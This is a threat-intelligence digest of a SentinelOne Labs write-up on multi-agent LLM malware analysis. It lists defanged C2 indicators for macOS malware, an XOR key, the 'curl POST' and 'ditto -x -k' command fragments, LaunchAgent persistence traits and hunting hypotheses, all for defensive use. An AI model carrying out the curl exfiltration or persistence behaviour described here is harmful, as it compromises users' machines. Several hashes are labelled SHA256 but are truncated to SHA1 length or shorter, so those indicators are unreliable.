Building an Adversarial Consensus Engine | Multi-Agent LLMs for Automated Malware Analysis
SentinelOne Labs developed a multi-agent LLM architecture using OpenClaw and Claude models to automate malware reverse engineering. By employing a serial consensus pipeline with an active rejection mandate, the system forces independent tool agents (radare2, Ghidra, Binary Ninja, IDA Pro) to cross-validate findings, significantly reducing decompiler artifacts and hallucinations.
Authors: SentinelOne Labs
Source:
SentinelOne
- filename/api/req/resSysJoker C2 API endpoint identified during analysis.
- sha25660c8128c48aac890a6d01448d1829a6edcdce0d2WizardUpdate macOS malware sample.
- sha256f5149543014e5b1bd7030711fd5c7d2a4bef0c2fSysJoker macOS malware sample.
- urlhxxps://eve[.]inspectorcleaner[.]com/vntC2 beacon endpoint used for exfiltrating system fingerprint data (event, machine, url, os_name, os_version).
Key Takeaways
- Multi-agent LLM architectures using serial consensus pipelines significantly reduce hallucinations in automated malware analysis.
- An 'Active Rejection Mandate' forces LLM agents to peer-review and explicitly reject decompiler artifacts from other tools.
- Deterministic bridge scripts are preferred over Model Context Protocol (MCP) for batch analysis due to lower latency and comprehensive extraction.
- Testing on macOS malware demonstrated the system's ability to cross-validate XOR-obfuscated payloads, hidden execution paths, and C2 endpoints.
Affected Systems
- macOS
Attack Chain
The analyzed macOS malware utilizes XOR-obfuscated payloads to hide its core capabilities from static analysis. Upon execution, it performs system fingerprinting by collecting the username, hardware UUID, and macOS version. It establishes persistence via a LaunchAgent plist configured to run hourly. Finally, it beacons to a remote C2 server using curl to exfiltrate the collected system data and potentially download further payloads via ditto archive extraction.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article focuses on automated malware analysis methodology and does not provide specific detection rules.
Detection Engineering Assessment
EDR Visibility: High — EDRs on macOS can effectively monitor process executions like curl and ditto, as well as file modifications in LaunchAgents directories. Network Visibility: Medium — C2 traffic is HTTPS (curl POST), limiting payload inspection without SSL decryption, but domain and IP connections are visible. Detection Difficulty: Moderate — While the payload strings are XOR obfuscated, the behavioral indicators (LaunchAgent creation, curl POSTs, ditto extraction) are standard and detectable.
Required Log Sources
- Process Execution Logs
- File Creation Logs
- Network Connection Logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for curl executions making POST requests with JSON payloads containing system fingerprinting data (event, machine, url, os_name). | Process Execution, Network Connections | Exfiltration | Low |
| Monitor for the creation of LaunchAgent plist files with RunAtLoad set to true and a StartInterval of 3600. | File Creation | Persistence | Medium |
| Hunt for processes querying the QuarantineEventsV2 database to extract download URLs. | File Access, Process Execution | Discovery | Low |
| Detect the use of 'ditto -x -k' for silent archive extraction in suspicious contexts or by unexpected parent processes. | Process Execution | Execution | Medium |
Control Gaps
- Static analysis tools may miss capabilities hidden behind XOR obfuscation without dynamic execution or advanced multi-tool consensus.
Key Behavioral Indicators
- ditto -x -k execution
- curl POST to unknown domains
- LaunchAgent creation with specific intervals
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Block the identified C2 domain (eve.inspectorcleaner.com) at the network perimeter.
- Hunt for the provided SHA256 hashes in the environment to identify potential compromises.
Infrastructure Hardening
- Implement strict egress filtering to prevent unauthorized curl communications to unknown external domains.
User Protection
- Ensure macOS endpoints are running modern EDR solutions capable of monitoring LaunchAgent persistence mechanisms.
Security Awareness
- N/A
MITRE ATT&CK Mapping
- T1027 - Obfuscated Files or Information
- T1140 - Deobfuscate/Decode Files or Information
- T1082 - System Information Discovery
- T1543.001 - Create or Modify System Process: Launch Agent
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1071.001 - Application Layer Protocol: Web Protocols
Additional IOCs
- Domains:
eve[.]inspectorcleaner[.]com- C2 domain extracted from malware payload.
- Urls:
hxxps://eve[.]inspectorcleaner[.]com/vnt- C2 beacon endpoint.
- File Hashes:
60c8128c48aac890a6d01448d1829a6edcdce0d2(SHA256) - WizardUpdate sample678aa572faa73f6873d24f24e423d315e7eb2c2d(SHA256) - Go Infostealer samplead7d2eb98ea4ddc7700db786aadb796b286da04(SHA256) - FinderRAT samplef5149543014e5b1bd7030711fd5c7d2a4bef0c2f(SHA256) - SysJoker sample
- File Paths:
/bin/bash- Hidden execution path utilized by the malware./api/req/res- SysJoker C2 API endpoint.
- Command Lines:
- Purpose: C2 beaconing and data exfiltration | Tools:
curl| Stage: Exfiltration |curl POST - Purpose: Archive extraction for payload delivery | Tools:
ditto| Stage: Execution |ditto -x -k
- Purpose: C2 beaconing and data exfiltration | Tools:
- Other:
QuarantineEventsV2- macOS Quarantine database queried by the malware to find its own download URL.OIUSYTASVBNMOPASDCCVBNZAXX- XOR key used for string obfuscation.